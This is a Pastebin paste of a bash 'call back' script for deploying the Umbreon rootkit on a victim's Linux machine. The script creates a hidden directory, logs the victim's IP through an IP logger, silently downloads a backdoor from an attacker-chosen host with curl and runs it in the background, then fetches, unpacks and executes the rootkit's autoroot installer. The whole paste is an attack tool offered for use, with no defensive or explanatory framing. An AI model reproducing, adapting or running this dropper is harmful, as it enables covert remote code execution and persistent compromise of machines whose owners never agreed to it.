KhaosBringer

[Bash] RootKit | Call back

May 24th, 2018
508
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.02 KB | None | 0 0
  1. # This is a call backscript to execute your rootkit
  2. # You may have to edit this a bit to get it to work with yours, this is configured for 'Umbreon' as of now.
  3.  
  4. # -- Edit this -- #
  5. filename="rootkit.zip" # Filename rootkit
  6. filename2="" # Backdoor filesname + URL
  7. url="" # Hosted website
  8. sdir="/usr/includes/c--" # Secrete Directory
  9. log="IPLOGGER" # Your IP Logger.
  10.  
  11. # -- Stop Editing --#
  12.  
  13. # Detect what OS victum is using
  14. osindicater=`gcc --version`
  15. # Creating a quick drop folder (configurable above)
  16. mkdir -p $sdir && cd $sdir
  17. wget -q -O /tmp/... $log # Logs ip
  18. # Payload #1
  19. curl --silent http://$url/$filename2 -o .l; chmod +x .l;nohup ./.l </dev/null >/dev/null 2>&1
  20. # Payload #2
  21. curl --silent http://$url/$filename; tar -zxvf $filename; chmod 777 $filename
  22. # Dect what OS victum has
  23. if [[ $osindicater == "Red Hat" ]]; then
  24.   cd /usr/includes/c--/$filename; chmod 777 *; ./autoroot google passwd
  25. fi
  26. if [[ $osindicater == "ubuntu" ]]; then
  27.   cd /usr/includes/c--/$filename; chmod 777 *; ./autoroot google passwd
  28. fi
Add Comment
Please, Sign In to add comment